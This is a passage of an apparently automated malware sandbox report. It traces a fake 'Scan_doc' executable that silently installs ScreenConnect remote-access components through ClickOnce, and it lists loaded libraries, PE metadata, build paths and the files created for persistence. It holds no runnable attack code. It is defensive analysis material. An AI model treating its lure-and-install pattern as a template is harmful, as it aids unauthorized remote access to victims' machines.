                  Source: C:\Windows\System32\svchost.exeSection loaded: msvcp110_win.dllJump to behavior
                  Source: C:\Windows\System32\svchost.exeSection loaded: policymanager.dllJump to behavior
                  Source: C:\Windows\System32\svchost.exeSection loaded: msvcp110_win.dllJump to behavior
                  Source: C:\Windows\System32\svchost.exeSection loaded: userenv.dllJump to behavior
                  Source: C:\Windows\System32\svchost.exeSection loaded: profapi.dllJump to behavior
                  Source: C:\Windows\System32\svchost.exeSection loaded: sspicli.dllJump to behavior
                  Source: C:\Windows\System32\svchost.exeSection loaded: policymanager.dllJump to behavior
                  Source: C:\Windows\System32\svchost.exeSection loaded: msvcp110_win.dllJump to behavior
                  Source: C:\Windows\System32\svchost.exeSection loaded: policymanager.dllJump to behavior
                  Source: C:\Windows\System32\svchost.exeSection loaded: msvcp110_win.dllJump to behavior
                  Source: C:\Windows\System32\svchost.exeSection loaded: policymanager.dllJump to behavior
                  Source: C:\Windows\System32\svchost.exeSection loaded: msvcp110_win.dllJump to behavior
                  Source: C:\Windows\System32\svchost.exeSection loaded: policymanager.dllJump to behavior
                  Source: C:\Windows\System32\svchost.exeSection loaded: msvcp110_win.dllJump to behavior
                  Source: C:\Windows\System32\svchost.exeSection loaded: policymanager.dllJump to behavior
                  Source: C:\Windows\System32\svchost.exeSection loaded: msvcp110_win.dllJump to behavior
                  Source: C:\Windows\System32\svchost.exeSection loaded: policymanager.dllJump to behavior
                  Source: C:\Windows\System32\svchost.exeSection loaded: msvcp110_win.dllJump to behavior
                  Source: C:\Windows\System32\svchost.exeSection loaded: kernel.appcore.dllJump to behavior
                  Source: C:\Windows\System32\svchost.exeSection loaded: qmgr.dllJump to behavior
                  Source: C:\Windows\System32\svchost.exeSection loaded: bitsperf.dllJump to behavior
                  Source: C:\Windows\System32\svchost.exeSection loaded: powrprof.dllJump to behavior
                  Source: C:\Windows\System32\svchost.exeSection loaded: xmllite.dllJump to behavior
                  Source: C:\Windows\System32\svchost.exeSection loaded: firewallapi.dllJump to behavior
                  Source: C:\Windows\System32\svchost.exeSection loaded: esent.dllJump to behavior
                  Source: C:\Windows\System32\svchost.exeSection loaded: umpdc.dllJump to behavior
                  Source: C:\Windows\System32\svchost.exeSection loaded: dnsapi.dllJump to behavior
                  Source: C:\Windows\System32\svchost.exeSection loaded: iphlpapi.dllJump to behavior
                  Source: C:\Windows\System32\svchost.exeSection loaded: fwbase.dllJump to behavior
                  Source: C:\Windows\System32\svchost.exeSection loaded: wldp.dllJump to behavior
                  Source: C:\Windows\System32\svchost.exeSection loaded: ntmarta.dllJump to behavior
                  Source: C:\Windows\System32\svchost.exeSection loaded: profapi.dllJump to behavior
                  Source: C:\Windows\System32\svchost.exeSection loaded: flightsettings.dllJump to behavior
                  Source: C:\Windows\System32\svchost.exeSection loaded: policymanager.dllJump to behavior
                  Source: C:\Windows\System32\svchost.exeSection loaded: msvcp110_win.dllJump to behavior
                  Source: C:\Windows\System32\svchost.exeSection loaded: netprofm.dllJump to behavior
                  Source: C:\Windows\System32\svchost.exeSection loaded: npmproxy.dllJump to behavior
                  Source: C:\Windows\System32\svchost.exeSection loaded: bitsigd.dllJump to behavior
                  Source: C:\Windows\System32\svchost.exeSection loaded: upnp.dllJump to behavior
                  Source: C:\Windows\System32\svchost.exeSection loaded: winhttp.dllJump to behavior
                  Source: C:\Windows\System32\svchost.exeSection loaded: ssdpapi.dllJump to behavior
                  Source: C:\Windows\System32\svchost.exeSection loaded: urlmon.dllJump to behavior
                  Source: C:\Windows\System32\svchost.exeSection loaded: iertutil.dllJump to behavior
                  Source: C:\Windows\System32\svchost.exeSection loaded: srvcli.dllJump to behavior
                  Source: C:\Windows\System32\svchost.exeSection loaded: netutils.dllJump to behavior
                  Source: C:\Windows\System32\svchost.exeSection loaded: appxdeploymentclient.dllJump to behavior
                  Source: C:\Windows\System32\svchost.exeSection loaded: cryptbase.dllJump to behavior
                  Source: C:\Windows\System32\svchost.exeSection loaded: wsmauto.dllJump to behavior
                  Source: C:\Windows\System32\svchost.exeSection loaded: miutils.dllJump to behavior
                  Source: C:\Windows\System32\svchost.exeSection loaded: wsmsvc.dllJump to behavior
                  Source: C:\Windows\System32\svchost.exeSection loaded: dsrole.dllJump to behavior
                  Source: C:\Windows\System32\svchost.exeSection loaded: pcwum.dllJump to behavior
                  Source: C:\Windows\System32\svchost.exeSection loaded: mi.dllJump to behavior
                  Source: C:\Windows\System32\svchost.exeSection loaded: userenv.dllJump to behavior
                  Source: C:\Windows\System32\svchost.exeSection loaded: gpapi.dllJump to behavior
                  Source: C:\Windows\System32\svchost.exeSection loaded: winhttp.dllJump to behavior
                  Source: C:\Windows\System32\svchost.exeSection loaded: wkscli.dllJump to behavior
                  Source: C:\Windows\System32\svchost.exeSection loaded: netutils.dllJump to behavior
                  Source: C:\Windows\System32\svchost.exeSection loaded: sspicli.dllJump to behavior
                  Source: C:\Windows\System32\svchost.exeSection loaded: ondemandconnroutehelper.dllJump to behavior
                  Source: C:\Windows\System32\svchost.exeSection loaded: msv1_0.dllJump to behavior
                  Source: C:\Windows\System32\svchost.exeSection loaded: ntlmshared.dllJump to behavior
                  Source: C:\Windows\System32\svchost.exeSection loaded: cryptdll.dllJump to behavior
                  Source: C:\Windows\System32\svchost.exeSection loaded: webio.dllJump to behavior
                  Source: C:\Windows\System32\svchost.exeSection loaded: mswsock.dllJump to behavior
                  Source: C:\Windows\System32\svchost.exeSection loaded: winnsi.dllJump to behavior
                  Source: C:\Windows\System32\svchost.exeSection loaded: fwpuclnt.dllJump to behavior
                  Source: C:\Windows\System32\svchost.exeSection loaded: rasadhlp.dllJump to behavior
                  Source: C:\Windows\System32\svchost.exeSection loaded: rmclient.dllJump to behavior
                  Source: C:\Windows\System32\svchost.exeSection loaded: usermgrcli.dllJump to behavior
                  Source: C:\Windows\System32\svchost.exeSection loaded: execmodelclient.dllJump to behavior
                  Source: C:\Windows\System32\svchost.exeSection loaded: propsys.dllJump to behavior
                  Source: C:\Windows\System32\svchost.exeSection loaded: coremessaging.dllJump to behavior
                  Source: C:\Windows\System32\svchost.exeSection loaded: twinapi.appcore.dllJump to behavior
                  Source: C:\Windows\System32\svchost.exeSection loaded: onecorecommonproxystub.dllJump to behavior
                  Source: C:\Windows\System32\svchost.exeSection loaded: execmodelproxy.dllJump to behavior
                  Source: C:\Windows\System32\svchost.exeSection loaded: resourcepolicyclient.dllJump to behavior
                  Source: C:\Windows\System32\svchost.exeSection loaded: vssapi.dllJump to behavior
                  Source: C:\Windows\System32\svchost.exeSection loaded: vsstrace.dllJump to behavior
                  Source: C:\Windows\System32\svchost.exeSection loaded: samcli.dllJump to behavior
                  Source: C:\Windows\System32\svchost.exeSection loaded: samlib.dllJump to behavior
                  Source: C:\Windows\System32\svchost.exeSection loaded: es.dllJump to behavior
                  Source: C:\Windows\System32\svchost.exeSection loaded: bitsproxy.dllJump to behavior
                  Source: C:\Windows\System32\svchost.exeSection loaded: ondemandconnroutehelper.dllJump to behavior
                  Source: C:\Windows\System32\svchost.exeSection loaded: dhcpcsvc6.dllJump to behavior
                  Source: C:\Windows\System32\svchost.exeSection loaded: dhcpcsvc.dllJump to behavior
                  Source: C:\Windows\System32\svchost.exeSection loaded: schannel.dllJump to behavior
                  Source: C:\Windows\System32\svchost.exeSection loaded: mskeyprotect.dllJump to behavior
                  Source: C:\Windows\System32\svchost.exeSection loaded: ntasn1.dllJump to behavior
                  Source: C:\Windows\System32\svchost.exeSection loaded: ncrypt.dllJump to behavior
                  Source: C:\Windows\System32\svchost.exeSection loaded: ncryptsslp.dllJump to behavior
                  Source: C:\Windows\System32\svchost.exeSection loaded: msasn1.dllJump to behavior
                  Source: C:\Windows\System32\svchost.exeSection loaded: cryptsp.dllJump to behavior
                  Source: C:\Windows\System32\svchost.exeSection loaded: rsaenh.dllJump to behavior
                  Source: C:\Windows\System32\svchost.exeSection loaded: dpapi.dllJump to behavior
                  Source: C:\Windows\System32\svchost.exeSection loaded: mpr.dllJump to behavior
                  Source: C:\Windows\System32\svchost.exeSection loaded: kernel.appcore.dllJump to behavior
                  Source: C:\Windows\System32\svchost.exeSection loaded: wlidsvc.dllJump to behavior
                  Source: C:\Windows\System32\svchost.exeSection loaded: ncrypt.dllJump to behavior
                  Source: C:\Windows\System32\svchost.exeSection loaded: cryptsp.dllJump to behavior
                  Source: C:\Windows\System32\svchost.exeSection loaded: profapi.dllJump to behavior
                  Source: C:\Windows\System32\svchost.exeSection loaded: clipc.dllJump to behavior
                  Source: C:\Windows\System32\svchost.exeSection loaded: dpapi.dllJump to behavior
                  Source: C:\Windows\System32\svchost.exeSection loaded: ntasn1.dllJump to behavior
                  Source: C:\Windows\System32\svchost.exeSection loaded: wldp.dllJump to behavior
                  Source: C:\Windows\System32\svchost.exeSection loaded: rsaenh.dllJump to behavior
                  Source: C:\Windows\System32\svchost.exeSection loaded: cryptbase.dllJump to behavior
                  Source: C:\Windows\System32\svchost.exeSection loaded: windows.storage.dllJump to behavior
                  Source: C:\Windows\System32\svchost.exeSection loaded: msxml6.dllJump to behavior
                  Source: C:\Windows\System32\svchost.exeSection loaded: msasn1.dllJump to behavior
                  Source: C:\Windows\System32\svchost.exeSection loaded: winhttp.dllJump to behavior
                  Source: C:\Windows\System32\svchost.exeSection loaded: netprofm.dllJump to behavior
                  Source: C:\Windows\System32\svchost.exeSection loaded: iphlpapi.dllJump to behavior
                  Source: C:\Windows\System32\svchost.exeSection loaded: policymanager.dllJump to behavior
                  Source: C:\Windows\System32\svchost.exeSection loaded: msvcp110_win.dllJump to behavior
                  Source: C:\Windows\System32\svchost.exeSection loaded: wtsapi32.dllJump to behavior
                  Source: C:\Windows\System32\svchost.exeSection loaded: winsta.dllJump to behavior
                  Source: C:\Windows\System32\svchost.exeSection loaded: gamestreamingext.dllJump to behavior
                  Source: C:\Windows\System32\svchost.exeSection loaded: msauserext.dllJump to behavior
                  Source: C:\Windows\System32\svchost.exeSection loaded: tbs.dllJump to behavior
                  Source: C:\Windows\System32\svchost.exeSection loaded: npmproxy.dllJump to behavior
                  Source: C:\Windows\System32\svchost.exeSection loaded: ondemandconnroutehelper.dllJump to behavior
                  Source: C:\Windows\System32\svchost.exeSection loaded: sspicli.dllJump to behavior
                  Source: C:\Windows\System32\svchost.exeSection loaded: dhcpcsvc6.dllJump to behavior
                  Source: C:\Windows\System32\svchost.exeSection loaded: dhcpcsvc.dllJump to behavior
                  Source: C:\Windows\System32\svchost.exeSection loaded: webio.dllJump to behavior
                  Source: C:\Windows\System32\svchost.exeSection loaded: mswsock.dllJump to behavior
                  Source: C:\Windows\System32\svchost.exeSection loaded: winnsi.dllJump to behavior
                  Source: C:\Windows\System32\svchost.exeSection loaded: dnsapi.dllJump to behavior
                  Source: C:\Windows\System32\svchost.exeSection loaded: rasadhlp.dllJump to behavior
                  Source: C:\Windows\System32\svchost.exeSection loaded: fwpuclnt.dllJump to behavior
                  Source: C:\Windows\System32\svchost.exeSection loaded: schannel.dllJump to behavior
                  Source: C:\Windows\System32\svchost.exeSection loaded: mskeyprotect.dllJump to behavior
                  Source: C:\Windows\System32\svchost.exeSection loaded: gpapi.dllJump to behavior
                  Source: C:\Windows\System32\svchost.exeSection loaded: cryptnet.dllJump to behavior
                  Source: C:\Windows\System32\svchost.exeSection loaded: ncryptsslp.dllJump to behavior
                  Source: C:\Windows\System32\svchost.exeSection loaded: cryptngc.dllJump to behavior
                  Source: C:\Windows\System32\svchost.exeSection loaded: devobj.dllJump to behavior
                  Source: C:\Windows\System32\svchost.exeSection loaded: ncryptprov.dllJump to behavior
                  Source: C:\Windows\System32\svchost.exeSection loaded: elscore.dllJump to behavior
                  Source: C:\Windows\System32\svchost.exeSection loaded: elstrans.dllJump to behavior
                  Source: C:\Windows\System32\svchost.exeSection loaded: kernel.appcore.dllJump to behavior
                  Source: C:\Windows\System32\svchost.exeSection loaded: licensemanagersvc.dllJump to behavior
                  Source: C:\Windows\System32\svchost.exeSection loaded: licensemanager.dllJump to behavior
                  Source: C:\Windows\System32\svchost.exeSection loaded: clipc.dllJump to behavior
                  Source: C:\Windows\System32\svchost.exeSection loaded: cryptsp.dllJump to behavior
                  Source: C:\Windows\System32\svchost.exeSection loaded: wldp.dllJump to behavior
                  Source: C:\Users\user\AppData\Local\Apps\2.0\Q57RWJAZ.OGC\QE1VAW8H.R8N\scre..tion_25b0fbb6ef7eb094_0018.0002_41099df9c1cd11bc\ScreenConnect.WindowsClient.exeSection loaded: mscoree.dllJump to behavior
                  Source: C:\Users\user\AppData\Local\Apps\2.0\Q57RWJAZ.OGC\QE1VAW8H.R8N\scre..tion_25b0fbb6ef7eb094_0018.0002_41099df9c1cd11bc\ScreenConnect.WindowsClient.exeSection loaded: apphelp.dllJump to behavior
                  Source: C:\Users\user\AppData\Local\Apps\2.0\Q57RWJAZ.OGC\QE1VAW8H.R8N\scre..tion_25b0fbb6ef7eb094_0018.0002_41099df9c1cd11bc\ScreenConnect.WindowsClient.exeSection loaded: kernel.appcore.dllJump to behavior
                  Source: C:\Users\user\AppData\Local\Apps\2.0\Q57RWJAZ.OGC\QE1VAW8H.R8N\scre..tion_25b0fbb6ef7eb094_0018.0002_41099df9c1cd11bc\ScreenConnect.WindowsClient.exeSection loaded: version.dllJump to behavior
                  Source: C:\Users\user\AppData\Local\Apps\2.0\Q57RWJAZ.OGC\QE1VAW8H.R8N\scre..tion_25b0fbb6ef7eb094_0018.0002_41099df9c1cd11bc\ScreenConnect.WindowsClient.exeSection loaded: vcruntime140_clr0400.dllJump to behavior
                  Source: C:\Users\user\AppData\Local\Apps\2.0\Q57RWJAZ.OGC\QE1VAW8H.R8N\scre..tion_25b0fbb6ef7eb094_0018.0002_41099df9c1cd11bc\ScreenConnect.WindowsClient.exeSection loaded: ucrtbase_clr0400.dllJump to behavior
                  Source: C:\Users\user\AppData\Local\Apps\2.0\Q57RWJAZ.OGC\QE1VAW8H.R8N\scre..tion_25b0fbb6ef7eb094_0018.0002_41099df9c1cd11bc\ScreenConnect.WindowsClient.exeSection loaded: ucrtbase_clr0400.dllJump to behavior
                  Source: C:\Users\user\AppData\Local\Apps\2.0\Q57RWJAZ.OGC\QE1VAW8H.R8N\scre..tion_25b0fbb6ef7eb094_0018.0002_41099df9c1cd11bc\ScreenConnect.WindowsClient.exeSection loaded: uxtheme.dllJump to behavior
                  Source: C:\Users\user\AppData\Local\Apps\2.0\Q57RWJAZ.OGC\QE1VAW8H.R8N\scre..tion_25b0fbb6ef7eb094_0018.0002_41099df9c1cd11bc\ScreenConnect.WindowsClient.exeSection loaded: dfshim.dllJump to behavior
                  Source: C:\Users\user\AppData\Local\Apps\2.0\Q57RWJAZ.OGC\QE1VAW8H.R8N\scre..tion_25b0fbb6ef7eb094_0018.0002_41099df9c1cd11bc\ScreenConnect.WindowsClient.exeSection loaded: urlmon.dllJump to behavior
                  Source: C:\Users\user\AppData\Local\Apps\2.0\Q57RWJAZ.OGC\QE1VAW8H.R8N\scre..tion_25b0fbb6ef7eb094_0018.0002_41099df9c1cd11bc\ScreenConnect.WindowsClient.exeSection loaded: iertutil.dllJump to behavior
                  Source: C:\Users\user\Desktop\Scan_doc_09_16_24_1120.exe Key value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Classes\WOW6432Node\CLSID\{00020420-0000-0000-C000-000000000046}\InprocServer32
                  Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\dfsvc.exe Key opened: HKEY_CURRENT_USER\Software\Microsoft\Internet Explorer\Settings
                  Source: Window Recorder Window detected: More than 3 window changes detected
                  Source: C:\Users\user\AppData\Local\Apps\2.0\Q57RWJAZ.OGC\QE1VAW8H.R8N\scre..tion_25b0fbb6ef7eb094_0018.0002_41099df9c1cd11bc\ScreenConnect.WindowsClient.exe File opened: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorrc.dll
                  Source: Scan_doc_09_16_24_1120.exe Static PE information: certificate valid
                  Source: Scan_doc_09_16_24_1120.exe Static PE information: data directory type: IMAGE_DIRECTORY_ENTRY_IMPORT
                  Source: Scan_doc_09_16_24_1120.exe Static PE information: data directory type: IMAGE_DIRECTORY_ENTRY_RESOURCE
                  Source: Scan_doc_09_16_24_1120.exe Static PE information: data directory type: IMAGE_DIRECTORY_ENTRY_BASERELOC
                  Source: Scan_doc_09_16_24_1120.exe Static PE information: data directory type: IMAGE_DIRECTORY_ENTRY_DEBUG
                  Source: Scan_doc_09_16_24_1120.exe Static PE information: data directory type: IMAGE_DIRECTORY_ENTRY_LOAD_CONFIG
                  Source: Scan_doc_09_16_24_1120.exe Static PE information: data directory type: IMAGE_DIRECTORY_ENTRY_IAT
                  Source: Scan_doc_09_16_24_1120.exe Static PE information: DYNAMIC_BASE, NX_COMPAT, TERMINAL_SERVER_AWARE
                  Source: Binary string: C:\builds\cc\cwcontrol\Product\WindowsFileManager\obj\Release\ScreenConnect.WindowsFileManager.pdb source: ScreenConnect.WindowsFileManager.exe0.1.dr, ScreenConnect.WindowsFileManager.exe.1.dr
                  Source: Binary string: C:\builds\cc\cwcontrol\Product\Client\obj\Release\net20\ScreenConnect.Client.pdbU source: dfsvc.exe, 00000001.00000002.2784738148.00000227082D0000.00000004.00000800.00020000.00000000.sdmp, dfsvc.exe, 00000001.00000002.2784738148.00000227082E0000.00000004.00000800.00020000.00000000.sdmp, dfsvc.exe, 00000001.00000002.2784738148.000002270806A000.00000004.00000800.00020000.00000000.sdmp, dfsvc.exe, 00000001.00000002.2784738148.0000022707F4C000.00000004.00000800.00020000.00000000.sdmp, ScreenConnect.WindowsClient.exe, 0000000A.00000002.2284476507.0000000001852000.00000002.00000001.01000000.00000013.sdmp, ScreenConnect.Client.dll.1.dr, ScreenConnect.Client.dll0.1.dr
                  Source: Binary string: C:\builds\cc\cwcontrol\Product\ClickOnceRunner\Release\ClickOnceRunner.pdb source: Scan_doc_09_16_24_1120.exe
                  Source: Binary string: C:\builds\cc\cwcontrol\Product\ClientService\obj\Release\ScreenConnect.ClientService.pdb source: dfsvc.exe, 00000001.00000002.2784738148.00000227082CC000.00000004.00000800.00020000.00000000.sdmp, dfsvc.exe, 00000001.00000002.2784738148.0000022708353000.00000004.00000800.00020000.00000000.sdmp, dfsvc.exe, 00000001.00000002.2784738148.000002270806A000.00000004.00000800.00020000.00000000.sdmp, dfsvc.exe, 00000001.00000002.2784738148.0000022707F47000.00000004.00000800.00020000.00000000.sdmp, ScreenConnect.ClientService.exe, 0000000B.00000002.2282591404.00000000024C2000.00000002.00000001.01000000.0000000E.sdmp, ScreenConnect.WindowsClient.exe, 0000000D.00000002.3273020779.00000000023F1000.00000004.00000800.00020000.00000000.sdmp, ScreenConnect.WindowsClient.exe, 0000000F.00000002.2941168266.00000000032F1000.00000004.00000800.00020000.00000000.sdmp, ScreenConnect.WindowsClient.exe, 0000000F.00000002.2940865152.0000000003100000.00000004.08000000.00040000.00000000.sdmp, ScreenConnect.ClientService.dll.1.dr, ScreenConnect.ClientService.dll0.1.dr
                  Source: Binary string: C:\builds\cc\cwcontrol\Product\WindowsClient\obj\Release\ScreenConnect.WindowsClient.pdbe source: ScreenConnect.WindowsClient.exe, 0000000A.00000000.2273256028.0000000000FF2000.00000002.00000001.01000000.0000000C.sdmp, ScreenConnect.WindowsClient.exe0.1.dr, ScreenConnect.WindowsClient.exe.1.dr
                  Source: Binary string: C:\Users\jmorgan\Source\cwcontrol\Custom\DotNetRunner\Release\DotNetServiceRunner.pdb source: ScreenConnect.ClientService.exe, 0000000B.00000000.2277621533.0000000000BCD000.00000002.00000001.01000000.0000000D.sdmp, ScreenConnect.ClientService.exe0.1.dr, ScreenConnect.ClientService.exe.1.dr
                  Source: Binary string: C:\builds\cc\cwcontrol\Product\Windows\obj\Release\net20\ScreenConnect.Windows.pdb source: dfsvc.exe, 00000001.00000002.2784738148.0000022707F43000.00000004.00000800.00020000.00000000.sdmp, dfsvc.exe, 00000001.00000002.2784738148.000002270806A000.00000004.00000800.00020000.00000000.sdmp, dfsvc.exe, 00000001.00000002.2784738148.000002270838D000.00000004.00000800.00020000.00000000.sdmp, dfsvc.exe, 00000001.00000002.2784738148.00000227082C8000.00000004.00000800.00020000.00000000.sdmp, ScreenConnect.WindowsClient.exe, 0000000A.00000002.2286646662.000000001C312000.00000002.00000001.01000000.00000012.sdmp, ScreenConnect.Windows.dll0.1.dr, ScreenConnect.Windows.dll.1.dr
                  Source: Binary string: C:\builds\cc\cwcontrol\Product\WindowsBackstageShell\obj\Release\ScreenConnect.WindowsBackstageShell.pdb source: ScreenConnect.WindowsBackstageShell.exe.1.dr, ScreenConnect.WindowsBackstageShell.exe0.1.dr
                  Source: Binary string: C:\builds\cc\cwcontrol\Product\WindowsClient\obj\Release\ScreenConnect.WindowsClient.pdb source: ScreenConnect.WindowsClient.exe, 0000000A.00000000.2273256028.0000000000FF2000.00000002.00000001.01000000.0000000C.sdmp, ScreenConnect.WindowsClient.exe0.1.dr, ScreenConnect.WindowsClient.exe.1.dr
                  Source: Binary string: C:\builds\cc\cwcontrol\Product\Windows\obj\Release\net20\ScreenConnect.Windows.pdbW] source: dfsvc.exe, 00000001.00000002.2784738148.0000022707F43000.00000004.00000800.00020000.00000000.sdmp, dfsvc.exe, 00000001.00000002.2784738148.000002270806A000.00000004.00000800.00020000.00000000.sdmp, dfsvc.exe, 00000001.00000002.2784738148.000002270838D000.00000004.00000800.00020000.00000000.sdmp, dfsvc.exe, 00000001.00000002.2784738148.00000227082C8000.00000004.00000800.00020000.00000000.sdmp, ScreenConnect.WindowsClient.exe, 0000000A.00000002.2286646662.000000001C312000.00000002.00000001.01000000.00000012.sdmp, ScreenConnect.Windows.dll0.1.dr, ScreenConnect.Windows.dll.1.dr
                  Source: Binary string: C:\builds\cc\cwcontrol\Product\Client\obj\Release\net20\ScreenConnect.Client.pdb source: dfsvc.exe, 00000001.00000002.2784738148.00000227082D0000.00000004.00000800.00020000.00000000.sdmp, dfsvc.exe, 00000001.00000002.2784738148.00000227082E0000.00000004.00000800.00020000.00000000.sdmp, dfsvc.exe, 00000001.00000002.2784738148.000002270806A000.00000004.00000800.00020000.00000000.sdmp, dfsvc.exe, 00000001.00000002.2784738148.0000022707F4C000.00000004.00000800.00020000.00000000.sdmp, ScreenConnect.WindowsClient.exe, 0000000A.00000002.2284476507.0000000001852000.00000002.00000001.01000000.00000013.sdmp, ScreenConnect.Client.dll.1.dr, ScreenConnect.Client.dll0.1.dr
                  Source: Binary string: C:\builds\cc\cwcontrol\Product\Core\obj\Release\net20\ScreenConnect.Core.pdb source: dfsvc.exe, 00000001.00000002.2784738148.000002270806A000.00000004.00000800.00020000.00000000.sdmp, dfsvc.exe, 00000001.00000002.2784738148.0000022707F3B000.00000004.00000800.00020000.00000000.sdmp, dfsvc.exe, 00000001.00000002.2784738148.000002270802E000.00000004.00000800.00020000.00000000.sdmp, dfsvc.exe, 00000001.00000002.2784738148.0000022707EC3000.00000004.00000800.00020000.00000000.sdmp, ScreenConnect.ClientService.exe, 0000000B.00000002.2283012190.0000000004B32000.00000002.00000001.01000000.0000000F.sdmp, ScreenConnect.Core.dll.1.dr, ScreenConnect.Core.dll0.1.dr
                  Source: Scan_doc_09_16_24_1120.exe Static PE information: Data directory: IMAGE_DIRECTORY_ENTRY_IMPORT is in: .rdata
                  Source: Scan_doc_09_16_24_1120.exe Static PE information: Data directory: IMAGE_DIRECTORY_ENTRY_RESOURCE is in: .rsrc
                  Source: Scan_doc_09_16_24_1120.exe Static PE information: Data directory: IMAGE_DIRECTORY_ENTRY_BASERELOC is in: .reloc
                  Source: Scan_doc_09_16_24_1120.exe Static PE information: Data directory: IMAGE_DIRECTORY_ENTRY_LOAD_CONFIG is in: .rdata
                  Source: Scan_doc_09_16_24_1120.exe Static PE information: Data directory: IMAGE_DIRECTORY_ENTRY_IAT is in: .rdata
                  Source: ScreenConnect.WindowsBackstageShell.exe.1.dr Static PE information: 0xB80EE04C [Tue Nov 8 12:57:48 2067 UTC]
                  Source: C:\Users\user\Desktop\Scan_doc_09_16_24_1120.exe Code function: 0_2_00831000 LocalAlloc,LocalAlloc,GetModuleFileNameW,CertOpenSystemStoreA,LocalAlloc,LocalAlloc,CryptQueryObject,LocalFree,CryptMsgGetParam,CryptMsgGetParam,LocalAlloc,LocalAlloc,CryptMsgGetParam,CertCreateCertificateContext,CertAddCertificateContextToStore,CertFreeCertificateContext,LocalFree,CryptMsgGetParam,LocalFree,LocalFree,CryptMsgGetParam,CryptMsgGetParam,CertFindAttribute,CertFindAttribute,CertFindAttribute,LoadLibraryA,GetProcAddress,Sleep,CertDeleteCertificateFromStore,CertDeleteCertificateFromStore,CertCloseStore,LocalFree,LocalFree,LocalFree,0_2_00831000
                  Source: Scan_doc_09_16_24_1120.exe Static PE information: real checksum: 0x1bda6 should be: 0x1b34e
                  Source: C:\Users\user\AppData\Local\Apps\2.0\Q57RWJAZ.OGC\QE1VAW8H.R8N\scre..tion_25b0fbb6ef7eb094_0018.0002_41099df9c1cd11bc\ScreenConnect.WindowsClient.exeCode function: 15_2_00007FF8492435AA push 00000030h; iretd 15_2_00007FF8492435AC
                  Source: C:\Users\user\AppData\Local\Apps\2.0\Q57RWJAZ.OGC\QE1VAW8H.R8N\scre..tion_25b0fbb6ef7eb094_0018.0002_41099df9c1cd11bc\ScreenConnect.WindowsClient.exeCode function: 15_2_00007FF849242F03 pushfd ; iretd 15_2_00007FF849242F8D

                  Persistence and Installation Behavior

                  Source: C:\Users\user\AppData\Local\Apps\2.0\Q57RWJAZ.OGC\QE1VAW8H.R8N\scre..tion_25b0fbb6ef7eb094_0018.0002_41099df9c1cd11bc\ScreenConnect.WindowsClient.exe File created: C:\Windows\system32\config\systemprofile\AppData\Local\Microsoft\CLR_v4.0\UsageLogs\ScreenConnect.WindowsClient.exe.log
                  Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\dfsvc.exe File created: C:\Users\user\AppData\Local\Apps\2.0\Q57RWJAZ.OGC\QE1VAW8H.R8N\scre..dows_4b14c015c87c1ad8_0018.0002_none_58890efb51813436\ScreenConnect.Windows.dll
                  Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\dfsvc.exe File created: C:\Users\user\AppData\Local\Temp\Deployment\YACW3ADK.OH1\8J0P1N95.WXG\ScreenConnect.WindowsBackstageShell.exe
                  Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\dfsvc.exe File created: C:\Users\user\AppData\Local\Temp\Deployment\YACW3ADK.OH1\8J0P1N95.WXG\ScreenConnect.Core.dll
                  Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\dfsvc.exe File created: C:\Users\user\AppData\Local\Apps\2.0\Q57RWJAZ.OGC\QE1VAW8H.R8N\scre..core_4b14c015c87c1ad8_0018.0002_none_5411371a15332106\ScreenConnect.Core.dll
                  Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\dfsvc.exe File created: C:\Users\user\AppData\Local\Apps\2.0\Q57RWJAZ.OGC\QE1VAW8H.R8N\scre..vice_4b14c015c87c1ad8_0018.0002_none_0564cf62aaf28471\ScreenConnect.ClientService.dll
                  Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\dfsvc.exe File created: C:\Users\user\AppData\Local\Temp\Deployment\YACW3ADK.OH1\8J0P1N95.WXG\ScreenConnect.WindowsClient.exe
                  Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\dfsvc.exe File created: C:\Users\user\AppData\Local\Apps\2.0\Q57RWJAZ.OGC\QE1VAW8H.R8N\scre..ient_4b14c015c87c1ad8_0018.0002_none_b558103dfe170413\ScreenConnect.WindowsClient.exe
                  Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\dfsvc.exe File created: C:\Users\user\AppData\Local\Apps\2.0\Q57RWJAZ.OGC\QE1VAW8H.R8N\scre...exe_25b0fbb6ef7eb094_0018.0002_none_98a7d58e59681f92\ScreenConnect.WindowsBackstageShell.exe
                  Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\dfsvc.exe File created: C:\Users\user\AppData\Local\Temp\Deployment\YACW3ADK.OH1\8J0P1N95.WXG\ScreenConnect.ClientService.exe
                  Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\dfsvc.exe File created: C:\Users\user\AppData\Local\Temp\Deployment\YACW3ADK.OH1\8J0P1N95.WXG\ScreenConnect.WindowsFileManager.exe
                  Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\dfsvc.exe File created: C:\Users\user\AppData\Local\Temp\Deployment\YACW3ADK.OH1\8J0P1N95.WXG\ScreenConnect.Client.dll
                  Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\dfsvc.exe File created: C:\Users\user\AppData\Local\Temp\Deployment\YACW3ADK.OH1\8J0P1N95.WXG\ScreenConnect.Windows.dll
                  Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\dfsvc.exe File created: C:\Users\user\AppData\Local\Apps\2.0\Q57RWJAZ.OGC\QE1VAW8H.R8N\scre..ient_4b14c015c87c1ad8_0018.0002_none_ea2694ec2482770a\ScreenConnect.Client.dll
                  Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\dfsvc.exe File created: C:\Users\user\AppData\Local\Apps\2.0\Q57RWJAZ.OGC\QE1VAW8H.R8N\scre...exe_25b0fbb6ef7eb094_0018.0002_none_98a7d58e59681f92\ScreenConnect.ClientService.exe
                  Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\dfsvc.exe File created: C:\Users\user\AppData\Local\Temp\Deployment\YACW3ADK.OH1\8J0P1N95.WXG\ScreenConnect.ClientService.dll
